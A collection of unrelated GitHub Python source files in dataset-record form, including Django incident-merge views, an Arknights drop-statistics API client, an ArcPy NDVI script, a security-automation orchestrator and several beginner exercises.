exceptions, status\nfrom rest_framework.decorators import detail_route\nfrom rest_framework.response import Response\n\nfrom acidatabase import models as aci_models\nfrom acidatabase import serializers\nfrom acidatabase.mixins import DataTableViewSetMixin\n\n\nUser = get_user_model()\n\n\nclass IncidentViewSet(DataTableViewSetMixin, viewsets.ModelViewSet):\n queryset = aci_models.Incident.objects.active()\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = serializers.IncidentSerializer\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n # Separate list view\n def get_serializer_class(self):\n if self.is_list:\n return serializers.IncidentListSerializer\n return serializers.IncidentSerializer\n\n def transform_ordering(self, ordering):\n ordering_str = ordering\n ordering = ordering.split(',')\n if 'long_id' in ordering_str:\n ordering = self.set_id_ordering(ordering)\n for name in ('status', 'origin'):\n if name in ordering_str:\n ordering = self.set_priority_ordering(ordering, name)\n return [name.strip() for name in ordering]\n\n def set_id_ordering(self, ordering, prefix=''):\n name = prefix + 'long_id'\n if name in ordering:\n index = ordering.index(name)\n ordering[index] = prefix + 'id_prefix'\n ordering.insert(index + 1, prefix + 'dj_id')\n return ordering\n return self.set_id_ordering(ordering, prefix='-')\n\n def set_priority_ordering(self, ordering, name, prefix=''):\n full_name = prefix + name\n if full_name in ordering:\n index = ordering.index(full_name)\n ordering[index] = \"{}{}_priority\".format(prefix, name)\n return ordering\n return self.set_priority_ordering(ordering, name, prefix='-')\n\n @detail_route(methods=['put', 'get'], url_path='finish-merge/(?P[0-9]+)')\n def finish_merge(self, *args, **kwargs):\n \"\"\" Remove secondary case after merging \"\"\"\n primary_case = self.get_object()\n secondary_case = self.get_queryset().filter(pk=kwargs['pk2']).first()\n if not secondary_case:\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n with transaction.atomic():\n secondary_case.keyactivity_set.update(incident=primary_case)\n secondary_case.keydocument_set.update(incident=primary_case)\n primary_case.related_cases.add(*secondary_case.related_cases.all())\n secondary_case.delete()\n return Response({'finished': True})\n\n\nclass RelatedIncidentViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = aci_models.Incident.objects.active().select_related(\n 'primary_reporter', 'primary_incident_type', 'primary_involvement', 'resolution', 'status')\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = serializers.RelatedIncidentSerializer\n\n\nclass IncidentMergeView(views.APIView):\n queryset = aci_models.Incident.objects.active().select_related(\n 'primary_reporter', 'primary_incident_type', 'primary_involvement', 'resolution', 'status')\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = serializers.IncidentSerializer\n\n def get(self, *args, **kwargs):\n main_case = self.validate_incident(int(kwargs.get('pk1')))\n secondary_case = self.validate_incident(int(kwargs.get('pk2')))\n main_case = self.serializer_class(main_case).data\n secondary_case = self.serializer_class(secondary_case).data\n\n for field in ('related_cases', 'suspects', 'reporters', 'animals', 'incident_type', 'involvement'):\n main_case[field] = self.merge_lists(main_case[field], secondary_case[field])\n for field in ('author', 'is_highlighted', 'primary_suspect', 'primary_reporter', 'status',\n 'resolution', 'primary_incident_type', 'primary_involvement', 'origin'):\n main_case[field] = self.merge_simple_value(main_case[field], secondary_case[field])\n\n self.merge_location(main_case, secondary_case)\n self.set_dates(main_case, secondary_case, 'created')\n\n main_case['notes'] = '{} {}'.format(main_case['notes'], secondary_case['notes']).strip() or ''\n return Response(main_case)\n\n def validate_incident(self, pk):\n incident = self.queryset.filter(pk=pk).first()\n if not incident:\n raise exceptions.NotFound('Incident with id=%s does not exist' % str(pk))\n return incident\n\n def merge_simple_value(self, main_value, secondary_value):\n # return first not null\n return main_value or secondary_value\n\n def merge_lists(self, main_values, secondary_values):\n ids = [el.get('id') for el in main_values]\n for value in secondary_values:\n if value['id'] not in ids:\n main_values.append(value)\n return main_values\n\n def merge_location(self, main_case, secondary_case):\n location_fields = ('location_desc', 'street', 'city', 'state', 'zip_code', 'county', 'jurisdictional_agency')\n location_exists = [main_case[field] for field in location_fields if main_case[field]]\n if not location_exists:\n for field in location_fields:\n if secondary_case[field]:\n main_case[field] = secondary_case[field]\n return main_case\n\n def set_dates(self, main_case, secondary_case, field):\n main_date = parse(main_case[field])\n secondary_date = parse(secondary_case[field])\n if secondary_date < main_date:\n main_case[field] = secondary_case[field]\n return main_case\n","repo_name":"Fibio/examples21","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27483766628","text":"#!/usr/bin/env python3\nimport sys\n#Find the string count of a string\n\ndef main():\n s = input(\"Enter a string to search: \")\n a = input(\"Enter a string to look: \")\n if not (type(s) == str and len(s.strip()) > 0):\n sys.stderr.write(\"Please input a valid string!\")\n exit(1)\n elif not (type(a) == str and len(a.strip()) > 0):\n sys.stderr.write(\"Please input a valid string!\")\n exit(1)\n # Find and display the Highest Common Factor\n s, a = str(s).strip(), str(a).strip()\n print(\"The count of the part[%s] inside a string[%s] => %s\" % (a, s, count(s, a)))\n\ndef count(s, a):\n if not s: #Base case 1\n return 0\n elif not a: #Base case 2\n return 0\n else:\n if s.startswith(a):\n return 1 + count(s[len(a):len(s)], a)\n else:\n return count(s[1:len(s)], a)\n\nmain() # Call the main function","repo_name":"jsdnhk/python-recursion-exercise","sub_path":"q10.py","file_name":"q10.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12106007654","text":"class Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n\t\t#some var \n result, break_loop, word = \"\", False, 0\n\t\t#looping for every letter(character)\n for letter in range(len(strs[0])):\n\t\t#looping for every word in the list\n for word in range(len(strs)-1):\n\t\t\t\t#the condition to stop searching\n try:\n if strs[word][letter] != strs[word+1][letter]:\n break_loop = True\n break\n except IndexError:\n break_loop = True\n break\n if break_loop:\n break\n\t\t\t#save the character \n result += strs[word][letter]\n return result\n","repo_name":"abhinav1912/LeetCode","sub_path":"Longest Common Prefix.py","file_name":"Longest Common Prefix.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31625720895","text":"# coding:utf8\nimport requests\nfrom PyQt5.QtGui import QGuiApplication\nimport json\nimport base64\nimport os\nimport urllib3\n\nurllib3.disable_warnings()\nDROP_TYPE = {'NORMAL_DROP': '常规掉落', 'EXTRA_DROP': '额外掉落',\n 'SPECIAL_DROP': '特殊掉落', 'FURNITURE': '家具掉落'}\n\n\nclass Penguin(object):\n \"\"\"企鹅统计相关api\"\"\"\n header = {'User-Agent': 'ozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.44 Safari/537.36 Edg/83.0.478.28',\n 'accept': 'application/json, text/plain, */*', 'origin': 'https://penguin-stats.cn', }\n report_url = 'https://penguin-stats.cn/PenguinStats/api/v2/report'\n plan_url = 'https://planner.penguin-stats.io/plan'\n\n def __init__(self, uid=None):\n super(Penguin, self).__init__()\n self.cookies = {'userID': ''}\n self.required = {'exclude': [], \"required\": {}, \"owned\": {\n }, \"extra_outc\": False, \"exp_demand\": False, \"gold_demand\": False}\n self.report_json = {'server': 'CN', 'stageId': '', 'drops': []}\n\n# 添加掉落汇报数据\n def update_report(self, stageId, drop_type, itemid, quantity):\n if self.report_json['stageId'] and stageId != self.report_json['stageId']:\n return None\n self.report_json['stageId'] = stageId\n self.header[\n 'Referer'] = f'https://penguin-stats.cn/report/{Penguin.get_zoneId_by_stageId(stageId)}/{stageId}'\n self.report_json['drops'].append(\n {'dropType': drop_type, 'itemId': itemid, 'quantity': quantity})\n with open(r'.\\temp_Data\\report.txt', 'w', encoding='utf8') as f:\n f.write(str(self.report_json))\n return True\n\n# 移除掉落汇报物品\n def remove_report(self, itemid: str = None, stage: str = None):\n if stage:\n self.report_json['stageId'] = ''\n self.header['Referer'] = ''\n for drop in self.report_json['drops']:\n if itemid == drop['itemId']:\n self.report_json['drops'].remove(drop)\n with open(r'.\\temp_Data\\report.txt', 'w', encoding='utf8') as f:\n f.write(str(self.report_json))\n return True\n else:\n return None\n\n# 汇报数据,返回哈希值\n def report(self):\n if not self.cookies['userID']:\n return 'no userID'\n if not self.report_json['drops']:\n return 'no drops'\n r = requests.post(\n self.report_url, json=self.report_json,\n headers=self.header, verify=False, cookies=self.cookies)\n if r.status_code == 201:\n self.report_json['drops'] = []\n self.report_json['stageId'] = ''\n os.remove(r'.\\temp_Data\\report.txt')\n return r.json()['reportHash']\n else:\n return None\n\n# 上传企鹅统计ID\n def update_id(self, uid):\n self.cookies['userID'] = uid\n\n# 删除企鹅统计ID\n def remove_id(self, uid):\n if uid == self.cookies['userID'] and self.cookies['userID']:\n self.cookies.pop('userID')\n return True\n else:\n return None\n\n# 添加刷图规划材料\n def update_need(self, name: str, count: int):\n self.required['required'][name] = count\n with open(r'.\\temp_Data\\need.txt', 'w', encoding='utf8') as f:\n f.write(str(self.required))\n\n# 移除刷图规划材料\n def remove_need(self, name: str):\n if name in self.required['required']:\n self.required['required'].pop(name)\n with open(r'.\\temp_Data\\need.txt', 'w', encoding='utf8') as f:\n f.write(str(self.required))\n return True\n else:\n return None\n\n# 规划\n def plan(self, out: False, exp: False, gold: False):\n self.required['extra_outc'] = out\n self.required['exp_demand'] = exp\n self.required['gold_demand'] = gold\n if not self.required['required']:\n return None\n QGuiApplication.processEvents()\n r = requests.post(\n self.plan_url, json=self.required,\n headers=self.header, verify=False, cookies=self.cookies)\n if r.status_code == 200:\n self.required['required'] = {}\n os.remove(r'.\\temp_Data\\need.txt')\n return r.json()\n else:\n return None\n\n# 格式化计划结果\n @staticmethod\n def format_plan(plan):\n if not plan:\n return None\n format_text = ''\n cost = str(plan['cost'])\n exp = str(plan['exp'])\n gold = str(plan['gold'])\n format_text += '预计理智花费: '+cost+'\\n'\n format_text += '预计获得经验: '+exp+'\\n'\n format_text += '预计龙门币收入: '+gold+'\\n'\n stages = [\n '运行:'+' '+x['stage']+' ' + x['count']+' '+'次' for x in plan['stages']]\n synthesis = [\n '合成:'+' '+x['target']+' ' + x['count']+' '+'次' for x in plan['syntheses']]\n for stage in stages:\n format_text += stage+'\\n'\n for synthesi in synthesis:\n format_text += synthesi+'\\n'\n return format_text\n\n# code转换zoneId\n @staticmethod\n def get_zoneId_by_code(code: str):\n data = Penguin.get_stage()\n return [x['zoneId'] for x in data if code == data['code']]\n\n# stageID转换zoneId\n @staticmethod\n def get_zoneId_by_stageId(stageId: str):\n data = Penguin.get_stage()\n return [x['zoneId'] for x in data if stageId == x['stageId']][0]\n\n# code转换stageId\n @staticmethod\n def get_stageId_by_code(code: str):\n data = Penguin.get_stage()\n return [x['stageId'] for x in data if code == x['code']][0]\n\n# 获取当前刷图规划需求物品\n @staticmethod\n def get_need_names():\n with open(r'.\\temp_Data\\need.txt', 'r', encoding='utf8') as f:\n data = eval(f.read())\n return [x[0] for x in data['required'].items()]\n\n# 获取当前掉落汇报的关卡\n @staticmethod\n def get_report_stage():\n with open(r'.\\temp_Data\\report.txt', 'r', encoding='utf8') as f:\n data = eval(f.read())\n return data['stageId']\n\n# 获取当前掉落汇报的物品\n @staticmethod\n def get_report_items():\n with open(r'.\\temp_Data\\report.txt', 'r', encoding='utf8') as f:\n data = eval(f.read())\n return [x['itemId'] for x in data['drops']]\n\n# 获取所有物品数据\n @ staticmethod\n def get_items():\n data = eval(open(r'.\\Data\\items.json', 'r', encoding='utf8').read())\n return data\n\n# droptype英文转中文\n @ staticmethod\n def droptype_to_CN(dp: str):\n return DROP_TYPE[dp]\n\n# droptype中文转英文\n @ staticmethod\n def droptype_to_EN(dp: str):\n return [x[0] for x in DROP_TYPE.items() if dp in x[1]][0]\n\n# 物品id转换为物品名\n @ staticmethod\n def itemid_to_name(id: str):\n data = Penguin.get_items()\n item_name = [x['name'] for x in data if id in x.values()]\n if item_name:\n return item_name[0]\n\n# 物品名转换为物品id\n @ staticmethod\n def name_to_itemid(name: str):\n data = Penguin.get_items()\n item_id = [x['itemId'] for x in data if name in x.values()]\n if item_id:\n return item_id[0]\n\n# 获取关卡中掉落的物品id\n @ staticmethod\n def get_stage_itemId(stage: str):\n drop_infos = Penguin.get_dropinfos(stage)\n for x in drop_infos:\n item_id = [y['itemId'] for y in x if 'itemId' in y.keys()]\n return item_id\n\n# 按照掉落类型获取关卡中掉落的物品id\n @ staticmethod\n def get_stage_itemId_by_droptype(stage: str, drop_type: str):\n drop_infos = Penguin.get_dropinfos(stage)\n for x in drop_infos:\n item_id = [\n y['itemId']for y in x if drop_type in y.values() and 'itemId' in y.keys()]\n return item_id\n\n# 获取所有关卡掉落信息\n @ staticmethod\n def get_dropinfos(stage: str):\n data = Penguin.get_stage()\n drop_infos = [\n x['dropInfos']for x in data if 'dropInfos' in x.keys() and stage in x.values()]\n return drop_infos\n\n# 获取关卡中所有掉落物品类型\n @staticmethod\n def get_droptype(stage: str):\n data = Penguin.get_dropinfos(stage)\n for x in data:\n drop_type = [y['dropType'] for y in x]\n if drop_type:\n return list(set(drop_type))\n else:\n return []\n\n# 获取所有关卡code\n @staticmethod\n def get_stage_code():\n data = json.loads(\n open(r'.\\Data\\stage.json', 'r', encoding='utf8').read())\n return [x['code'] for x in data if 'dropInfos' in x.keys()]\n\n# 获取所有关卡数据\n @staticmethod\n def get_stage(server: str = 'CN'):\n data = json.loads(\n open(r'.\\Data\\stage.json', 'r', encoding='utf8').read())\n return data\n\n# 更新本地关卡信息\n @staticmethod\n def down_stage(server: str = 'CN'):\n r = requests.get(\n 'https://penguin-stats.io/PenguinStats/api/v2/stages?server={server}')\n result = str(r.json())\n with open(r'.\\Data\\stage.json', 'w', encoding='utf8') as f:\n f.write(result)\n\n# 更新本地物品信息\n @staticmethod\n def down_items():\n r = requests.get('https://penguin-stats.io/PenguinStats/api/v2/items')\n result = str(r.json())\n with open(r'.\\Data\\items.json', 'w', encoding='utf8') as f:\n f.write(result)\n","repo_name":"Inull-Studio/AutoArknights","sub_path":"Core/Material.py","file_name":"Material.py","file_ext":"py","file_size_in_byte":9549,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} +{"seq_id":"72297373635","text":"# Step 3 - Python Script from Tools\n\nimport os, arcpy\nfrom arcpy.sa import *\nlistMonths = [\"02\", \"04\", \"05\", \"07\", \"10\", \"11\"]\noutputDirectory = \"C:/data/d1/6/ALL_Files/Step_3_data_lfs/NVDI\"\nif not os.path.exists(outputDirectory):\n os.mkdir(outputDirectory)\n\nfor month in listMonths:\n arcpy.env.workspace = r\"C:\\data\\d1\\6\\All_Files\\Step_3_data_lfs\\2015\" + month\n listRasters = arcpy.ListRasters(\"*\", \"TIF\")\n visRaster = [x for x in listRasters if (\"T1_B4\") in x]\n print(\"For vistion Rasters in month: \" + month + \", there are: \" + str(len(visRaster)) + \" bands to process.\")\n nirRaster = [x for x in listRasters if (\"T1_B5\") in x]\n print(\"For NIR Rasters in month: \" + month + \", there are: \" + str(len(nirRaster)) + \" bands to process.\")\n output_raster = \"NVDI\"+month\n output_raster = (Raster(nirRaster[0]) - Raster(visRaster[0])) / (Raster(nirRaster[0]) + Raster(visRaster[0]))\n output_raster.save(os.path.join(outputDirectory, \"2015_\" + month + \"_NVDI.tif\"))\n \n\n","repo_name":"nickcurci/ArcPy","sub_path":"CodingChallenges/6 - Week_Six/1- Coding Challenge One For Week6.py","file_name":"1- Coding Challenge One For Week6.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"38623720989","text":"import random\r\ndef get_choices():\r\n player_choice=input(\" Enter a choice('Rock','Paper','Scissor') :\")\r\n option=[\"Rock\",\"Paper\",\"Scissor\"]\r\n computer_choice=random.choice(option)\r\n choices={\"Player\":player_choice, \"Computer\":computer_choice}\r\n return choices\r\n\r\ndef check_win(Player,Computer):\r\n #print(\"your choice is \"+ Player+ \" , & computer choice is \"+Computer)\r\n print(f\"your choice is {Player} & computer choice is {Computer}\")\r\n if Player==Computer:\r\n print(\"it is a tie!\")\r\n elif Player==\"Rock\" and Computer==\"Paper\":\r\n print(\"Here, Computer is winner.\")\r\n elif Player==\"Paper\" and Computer==\"Scissor\":\r\n print(\"Here, Computer is winner.\")\r\n elif Player==\"Scissor\" and Computer==\"Rock\":\r\n print(\"Here, Computer is winner.\")\r\n elif Player==\"Rock\" and Computer==\"Scissor\":\r\n print(\"Here, you are winner.\")\r\n elif Player==\"Scissor\" and Computer==\"Paper\":\r\n print(\"Here, you are winner.\")\r\n elif Player==\"Paper\" and Computer==\"Rock\":\r\n print(\"Here, you are winner.\")\r\n else:\r\n print(\"Sorry, no one are winner.\")\r\nChoice=get_choices()\r\nresult=check_win(Choice[\"Player\"], Choice[\"Computer\"])\r\nprint(result)\r\n\r\n\r\n","repo_name":"MANGUKIYANIRAJB/My_codes","sub_path":"rock_paper_Scissor_game.py","file_name":"rock_paper_Scissor_game.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10194749196","text":"import base64\nimport time\n\nfrom utils.web_interactive import WebInteractive as wi\n\n\nclass GitHub:\n @staticmethod\n @wi.response('json')\n @wi.request('GET', 'https://api.github.com/repos/%s/%s/commits')\n def _commits(user, repo, sha=None, path=None, author=None, since=None, until=None):\n params = locals()\n for k in ['user', 'repo']:\n params.pop(k)\n req_data = {\n 'url_args': (user, repo),\n 'params': params,\n }\n return req_data\n\n @staticmethod\n @wi.response('json')\n @wi.request('GET', 'https://api.github.com/repos/%s/%s/git/trees/%s')\n def _git_trees(user, repo, sha, recursive=None):\n params = locals()\n for k in ['user', 'repo', 'sha']:\n params.pop(k)\n req_data = {\n 'url_args': (user, repo, sha),\n 'params': params,\n }\n return req_data\n\n @staticmethod\n @wi.response('json')\n @wi.request('GET', 'https://api.github.com/repos/%s/%s/git/blobs/%s')\n def _git_blobs(user, repo, sha):\n req_data = {\n 'url_args': (user, repo, sha),\n }\n return req_data\n\n @staticmethod\n def get_commits(user, repo, sha=None):\n raw_commits = GitHub._commits(user, repo, sha)\n\n commits = []\n for rc in raw_commits:\n info = rc['commit'] # type: dict\n date = time.strptime(info['author']['date'], '%Y-%m-%dT%H:%M:%SZ')\n item = {\n 'sha': rc['sha'],\n 'sha_tree': info['tree']['sha'],\n 'date': time.strftime('%Y-%m-%d %H:%M:%S', date),\n 'message': info['message'],\n }\n commits.append(item)\n\n rc_last = raw_commits[-1]\n if len(rc_last['parents']) != 0:\n parent = rc_last['parents'][0]\n next_commits = GitHub.get_commits(user, repo, parent['sha'])\n for nc in next_commits:\n commits.append(nc)\n\n return commits\n\n @staticmethod\n def get_trees(user, repo, sha, recursive=1):\n raw_trees = GitHub._git_trees(user, repo, sha, recursive) # type: dict\n\n if 'tree' in raw_trees:\n trees = []\n for rt in raw_trees['tree']:\n item = {\n 'path': rt['path'],\n 'type': rt['type'],\n 'sha': rt['sha'],\n }\n if item['type'] == 'blob':\n item['size'] = rt['size']\n\n trees.append(item)\n\n if raw_trees['truncated']:\n next_trees = GitHub.get_trees(user, repo, sha, recursive + 1)\n for nt in next_trees:\n trees.append(nt)\n\n return trees\n\n @staticmethod\n def get_blobs(user, repo, sha):\n raw_blobs = GitHub._git_blobs(user, repo, sha)\n\n print(raw_blobs)\n size = raw_blobs['size']\n content = base64.b64decode(raw_blobs['content'])\n\n blobs = {\n 'size': size,\n 'content': content,\n 'validate': len(content) == size,\n }\n\n return blobs\n","repo_name":"HsOjo/ResourceUpdateTest","sub_path":"api/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72906445315","text":"import os\nimport json\nfrom sec_automation.datamanager import DataManager \nimport sec_automation.configmanager as cm\nimport importlib\nfrom sys import exit\nfrom copy import deepcopy\n#from app.data.gcp_data import gcp_data\n\n\nimport logging\nlogger = logging.getLogger(__name__)\n# ch = logging.StreamHandler() # console handler\n# ch.setLevel(logging.DEBUG)\n# formatter = logging.Formatter('%(levelname)s - %(name)s - %(message)s') \n# ch.setFormatter(formatter) # add formatter\n\n# # add ch & fh to logger\n# logger.addHandler(ch)\n\nclass Orchestrator():\n def __init__(self):\n self.options=cm.data_options()\n self.dm = DataManager()\n logger.debug(\"orchestrator instantiation complete\")\n\n def getdata(self,command=None, datatype=None):\n logger.debug(\"start of Orchestrator getData function\")\n data_array = []\n if command==None and datatype==None:\n logger.error(\"You must specify either a Command or Datatype\")\n raise Exception(\"You must specify either a Command or Datatype\")\n try:\n if command != None and self.validate_command(command):\n # pull list of required datatypes for this command\n datatypes=self.options['commands'][command]['datatypes']\n logger.debug(\"datatypes loaded for command: {}, datatypes: {}\".format(command,datatypes))\n # Iterate through datatypes to pull the data\n for dt in datatypes:\n #function to take datatype map it to a package and functiona and call this functions\n data = self.trigger_datatype_request(dt)\n logger.debug(\"data retrieved for datatype: {}\".format(dt))\n # some functions return an array of data. e.g. azure as we have multiple tenants\n if type(data) == dict:\n data_array.append(deepcopy(self.dm.storefile(data,dt)))\n logger.debug(\"data stored\")\n elif type(data) == list:\n logger.info(\"Multiple data sets returned for datatype {}\".format)\n for data_object in data:\n data_array.append(deepcopy(self.dm.storefile(data_object,dt)))\n logger.debug(\"data stored\")\n else:\n logger.error(\"unknown type for returned data. type: {}\".format(type(data)))\n exit(1)\n elif datatype != None and self.validate_datatype(datatype):\n data = self.trigger_datatype_request(datatype)\n # some functions return an array of data. e.g. azure as we have multiple tenants\n if type(data) == dict:\n data_array.append(deepcopy(self.dm.storefile(data,datatype)))\n logger.debug(\"data stored\")\n elif type(data) == list:\n logger.info(\"Multiple data sets returned for datatype {}\".format)\n for data_object in data:\n data_array.append(deepcopy(self.dm.storefile(data_object,datatype)))\n logger.debug(\"data stored\")\n else:\n logger.error(\"unknown type for returned data. type: {}\".format(type(data)))\n exit(1)\n logger.info(\"[Orchestrator.getData] Data Request Complete\")\n except Exception as e:\n logger.error(\"Unknown Error\")\n logger.error(e, exc_info=True)\n exit(1)\n\n def command(self, command=None):\n '''\n Function to gather data related to command and then run the command action without writing to disk\n '''\n logger.debug(\"start of Orchestrator command function\")\n data_array = []\n if command==None :\n logger.error(\"You must specify either a Command\")\n raise Exception(\"You must specify either a Command\")\n try:\n if command != None and self.validate_command(command):\n # pull list of required datatypes for this command\n datatypes=self.options['commands'][command]['datatypes']\n logger.debug(\"datatypes loaded for command: {}, datatypes: {}\".format(command,datatypes))\n # Iterate through datatypes to pull the data\n if len(datatypes)>0:\n for dt in datatypes:\n #function to take datatype map it to a package and functiona and call this functions\n data = self.trigger_datatype_request(dt)\n logger.debug(\"data retrieved for datatype: {}\".format(dt))\n # using deepcopy to ensure a pointer isn't returned\n if type(data) == dict:\n data_array.append(deepcopy(self.dm.cachefile(data,dt)))\n logger.debug(\"data stored\")\n elif type(data) == list:\n logger.info(\"Multiple data sets returned for datatype {}\".format)\n for data_object in data:\n data_array.append(deepcopy(self.dm.cachefile(data_object,dt)))\n logger.debug(\"data stored\")\n else:\n logger.error(\"unknown type for returned data. type: {}\".format(type(data)))\n exit(1)\n \n logger.info(\"[Orchestrator.command] Data Request Complete\")\n ###\n # Executing the command now that the data is gathered\n logger.info(\"[Orchestrator.command] Starting to action data\")\n \n for data in data_array:\n datatype = data['datatype']\n logger.info(\"[Orchestrator.dataaction] Actioning datatype {}\".format(datatype))\n app = self.options['commands'][command]['app']\n module = importlib.import_module(app)\n try:\n method = getattr(module, command)\n except AttributeError:\n raise NotImplementedError(\"Class `{}` does not implement `{}`\".format(option['app'], datatype))\n method(data)\n logger.info(\"[Orchestrator.dataaction] Data Actions Complete\")\n else:\n # Action command that takes no data input\n logger.info(\"[Orchestrator.dataaction] Actioning command {} without any data\".format(command))\n app = self.options['commands'][command]['app']\n module = importlib.import_module(app)\n try:\n method = getattr(module, command)\n except AttributeError:\n raise NotImplementedError(\"Class `{}` does not implement `{}`\".format(option['app'], datatype))\n method()\n logger.info(\"[Orchestrator.dataaction] Data Actions Complete\")\n except Exception as e:\n logger.error(\"Unknown Error\")\n logger.error(e, exc_info=True)\n exit(1)\n\n\n def dataaction(self,file_name=None, build_queue=False):\n 'Top level function which will be called by main package'\n if file_name==None and build_queue==False:\n logger.error(\"You must specify either file name or Build Queue\")\n raise Exception(\"You must specify either file name or Build Queue\")\n \n data = self.dm.loadfile(file_name)\n\n datatype = data['datatype']\n commands = cm.related_commands(datatype)\n for command in commands:\n app = self.options['commands'][command]['app']\n option = self.options['datatypes'][datatype]\n module = importlib.import_module(app)\n try:\n method = getattr(module, command)\n except AttributeError:\n raise NotImplementedError(\"Class `{}` does not implement `{}`\".format(option['app'], datatype))\n method(data)\n logger.info(\"[Orchestrator.dataaction] Data Actions Complete\")\n\n########################\n# Supporting Methods\n########################\n\n def action_data(data):\n datatype = data['datatype']\n commands = cm.related_commands(datatype)\n for command in commands:\n app = self.options['commands'][command]['app']\n option = self.options['datatypes'][datatype]\n module = importlib.import_module(app)\n try:\n method = getattr(module, command)\n except AttributeError:\n raise NotImplementedError(\"Class `{}` does not implement `{}`\".format(option['app'], datatype))\n method(data)\n logger.info(\"[Orchestrator.dataaction] Data Actions Complete\")\n\n def trigger_datatype_request(self,datatype):\n '''\n Functions to call the related function based on datatype. \n Intput is datatype as a string. \n\n The options file has a mapping between datatype and the related python module which pulls that datatype\n '''\n\n option = self.options['datatypes'][datatype]\n\n # reference: https://stackoverflow.com/questions/4821104/dynamic-instantiation-from-string-name-of-a-class-in-dynamically-imported-module\n # reference: https://stackoverflow.com/questions/7936572/python-call-a-function-from-string-name/7936588\n \n #Import package based on app name in mapping file\n module = importlib.import_module(option['app'])\n logger.info(\"loading module: {}\".format(module))\n try:\n method = getattr(module, datatype)\n data = method()\n except AttributeError:\n logger.critical(\"Class `{}` does not implement `{}`\".format(option['app'], datatype))\n raise NotImplementedError(\"Class `{}` does not implement `{}`\".format(option['app'], datatype))\n return data\n\n def validate_command(self,command):\n valid=True\n if command not in self.options['commands']:\n valid = False\n logger.error(\"[Orchestrator.validate_command] Invalid Command {}\".format(command))\n raise Exception(\"[Orchestrator.validate_command] Invalid Command\")\n return valid\n\n def validate_datatype(self,datatype):\n valid=True\n if datatype not in self.options['datatypes'].keys():\n valid = False\n logger.error(\"[Orchestrator.validate_datatype] Invalid datatype {} -- Valid datatypes:{}\".format(datatype,self.options['datatypes'].keys()))\n raise Exception(\"[Orchestrator.validate_datatype] Invalid Datatype\")\n return valid\n","repo_name":"kvql/sec-automation-library","sub_path":"sec_automation/orchestrator.py","file_name":"orchestrator.py","file_ext":"py","file_size_in_byte":10898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75093562114","text":"from celery_app import app\nfrom stream_manager import StreamManager\nfrom utils import fetch_streams\nimport redis\n\n\nstreams = fetch_streams()\nqueue_name = 'queue:clips'\nstream_mgr = StreamManager(app, streams, queue_name)\n\n\n@app.task(name='decoder.add_stream')\ndef add_stream(stream_prop):\n print('new stream recived')\n stream_mgr.add_new_stream(stream_prop)\n print('Stream: {} added'.format(stream_prop))\n\n@app.task(name='decoder.remove_stream')\ndef remove_stream(stream_id):\n res = stream_mgr.remove_stream(stream_id)\n print('stream {} {} removed'.format(stream_id, res))\n return res\n\n\n","repo_name":"BehnamSamadi/Real-Time-Video-Event-Analyzer","sub_path":"decoder/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"16013281068","text":"import random\nA=[]\nfor i in range(7):\n A.append([])\n for j in range(24):\n num=random.randint(5,33)\n A[i].append(num)\nprint('matriz A: ')\nfor i in range(7):\n print(A[i])\nmayor=A[0][0]\nmenor=A[0][0]\nfor i in A:\n for j in i:\n if j>mayor:\n mayor=j\n if jmayor:\n mayor=A[i][j]\n vecmay.append(mayor)\n mayor=0\nmaximo=max(vecmay)\nprint('el dia que se registro mayor temperatura fue :' ,maximo,'grados')","repo_name":"gustavofloresSz/trabajos-3er-parcial","sub_path":"Prac matrice-2/ejer14.py","file_name":"ejer14.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74582047873","text":"# x = list(map(int, input().split()))\r\n# target = int(input())\r\n#\r\n# for i in range(len(x)-1):\r\n# for j in range(i + 1, len(x)):\r\n# if x[i] + x[j] == target:\r\n# print([i, j])\r\n\r\ndef twosum(arr, target):\r\n x = []\r\n for i in range(len(arr)-1):\r\n for j in range(i+1, len(arr)):\r\n if arr[i]+arr[j]==target:\r\n x.append(i)\r\n x.append(j)\r\n break\r\n print(x)\r\n\r\narr = list(map(int, input().split()))\r\ntarget =int(input())\r\ntwosum(arr, target)","repo_name":"aryanxk02/HackerRank-Solutions","sub_path":"Problem Solving/two sum.py","file_name":"two sum.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72822252034","text":"from time import sleep\nfrom traceback import print_tb\nfrom turtle import down\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.remote.webdriver import WebDriver\nfrom rich.console import Console\nfrom rich.table import Table\nfrom selenium.webdriver.common.keys import 